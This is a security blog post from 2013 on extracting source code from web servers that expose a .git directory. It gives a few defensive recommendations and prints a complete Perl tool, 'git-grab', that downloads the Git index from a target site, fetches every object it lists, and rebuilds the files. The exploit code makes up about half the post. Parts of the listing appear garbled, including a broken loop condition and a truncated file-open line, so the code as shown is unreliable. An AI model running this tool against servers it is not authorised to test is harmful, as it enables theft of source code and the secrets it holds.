Blog: How Tos

Git Extraction – Abusing version control systems

David Lodge 04 Oct 2013

For those who have heard of me you might have read my articles on cirt.net (on SVN Pristine Extractor and Mercurial Extractor) about abusing various revision and version control systems when they are being used to manage content on web servers. You may even have seen me presenting at the East Midlands OWASP chapter meeting in May.

I promised then that the next step would be Git. That promise is now delivered as I’ve found a real world web server being managed through Git.

Git was originally designed by Linus Torvalds (you may recognise that name) as a replacement for BitKeeper.

It is becoming more and more popular for a lot of open source projects and is used for such worthy products as the Linux kernel, Android and the Nikto web scanner.

Like SVN or mercurcial, Git stores its metadata files in a “hidden” directory: .git. This directory has several files and directories that can be used to gather information:

.git/config is a text file that tells the system the branch of the code and the source server and username used to check out the data. This is useful for information gathering but doesn’t help us further.

.git/index is an index of all files in the repository which will allow us to extract the filenames present. This is a binary file, but the format is easy to work out and a custom tool can easily be written.

.git/objects and .git/pack contain the complete objects or a packed version on them, depending on internal magical gubbins: I’ve seen Git repositories with every object in objects/. and I’ve seen repositories with no objects in object/. The important bit here is that files are stored by their SHA1 hash with no file extension.

So, we find a web server where somebody has used Git as their release mechanism and left the .git file around; what can we do?
First off we extract .git/index, this gives us a list of filenames and their hashes:

[dave@xxxxxxxxxx git-decode]$ ./git-decode.pl index

2bf0b6f857ac399e2e8bdfa19dec4674edb8ee5e index.html

93640e83ded965b7a76f6dde906361bbf7b566d9 secretfile.php

Now we can try and extract each file by seeing whether 93/640e83ded965b7a76f6dde906361bbf7b566d9 exists. If it does we can download it, decompress it and read whatever contents it has.

Now, I’m lazy, so I wrote a perl script which will do this for you, just after the Recommendations. The syntax for calling it is simply:

git-grab www.targetURLname.com

Recommendations

– Check security of release processes

– Don’t checkout into web directory

– Evaluate hidden files

GIT-GRAB script

#!/usr/bin/perl

use strict;
use File::Path qw(make_path);
use LWP::UserAgent;
use File::Temp qw(tempfile tempdir);
use Compress::Zlib qw(uncompress);

sub readtime
{
   my ($handle, $hashref) = @_;

   read $handle, my $rawtime, 8;

   ( $hashref->{'lsb32'},
     $hashref->{'nsec'} ) = unpack "NN", $rawtime;

   return $hashref;
}

sub readindex
{
   my ($infile) = @_;
   my $packindex;

   # read the header
   read $infile, my $rawheader, 12;
   my $header = {};
   ($header->{'ident'}, $header->{'version'}, $header->{'entries'})
      = unpack("a4NN", $rawheader);

   die "Not a git index file" if ($header->{'ident'} ne "DIRC");
   die "Unsupported version of git index" if ($header->{'version'} != 2);

   my @index_entries = ();

   for (my $i=0; $i{'entries'}; $i++)
   {
      my $statinfo = {};
      my $entry = {};
      my $rawdata;
      my %ctime = ();
      my %mtime = ();

      $statinfo->{'ctime'}=readtime($infile, \%ctime);
      $statinfo->{'mtime'}=readtime($infile, \%ctime);

      # read the non-time fields
      read $infile, $rawdata, 24; 
      ( $statinfo->{'dev'}.
        $statinfo->{'inode'}.
        $statinfo->{'mode'}.
        $statinfo->{'uid'}.
        $statinfo->{'gid'}.
        $statinfo->{'size'} ) = unpack "NNNNNN", $rawdata;

      $entry->{'statinfo'}=$statinfo;
      read $infile, $rawdata, 20; 
      ( $entry->{'id'} ) = unpack "H*", $rawdata;
      $packindex.=$rawdata;
      read $infile, $rawdata, 2; 
      ( $entry->{'flags'} ) = unpack "n", $rawdata;

      # Finally read name - it's length is the lower 11 bits of flags
      my $namelength=($entry->{'flags'} & 0x7ff)+1;

      # Pad it up to a multiple of 4
      read $infile, $rawdata, $namelength + (8 - (($namelength + 62) % 8)) %8; 
      ($entry->{'name'}) = unpack "a" . ($namelength-1), $rawdata;

      push(@index_entries, $entry);
   }
   return @index_entries;
}

# First grab the database file
my $target=$ARGV[0];
my $giturl="http://$ARGV[0]/.git/index";
my $ua=LWP::UserAgent->new;
print "Target is: $giturl\n";
$ua->agent("All Your Files Are Belong To Us/1.0");
my $request=HTTP::Request->new(GET => $giturl);
my $result=$ua->request($request);

if ($result->status_line !~ /^200/)
{
   die "Could not find Git index file";
}

my ($dbfileh, $dbfilen) = tempfile();
print $dbfileh $result->content;
close $dbfileh;

open(my $infile, "{'id'},0,2);
   my $resthash=substr($entry->{'id'},2);

   my $file=".git/objects/" . $firsttwo . "/" . $resthash;
   my $rawdata;
   my $decompressed;
   my $oh;

   print "Extracting " . $entry->{'name'} . "\n";

   my $giturl="http://$server/$file";
   my $frequest=HTTP::Request->new(GET => $giturl);
   my $fresult=$ua->request($frequest);
   $rawdata=$fresult->content;

   # Make sure the path is there for the output
   my $outputpath="output/" . $entry->{'name'};
   $outputpath =~ s#/[^/]*$##g;

   make_path($outputpath);
   open $oh, ">", "output/$entry->{'name'}";

   # Now decompress the data
   $decompressed=uncompress($rawdata);
   my $gitfile={};

   ($gitfile->{'type'}) = substr($decompressed,0,5);
   if ($gitfile->{'type'} ne "blob ")
   {
      print "Unknown git file type: $gitfile->{'type'}. Skipping\n";
      next;
   }
   ($gitfile->{'size'}) = unpack "Z*", substr($decompressed,5);
   ($gitfile->{'data'}) = substr($decompressed,length($gitfile->{'size'})+6);

   # And write it
   print $oh $gitfile->{'data'};
   close($oh);
}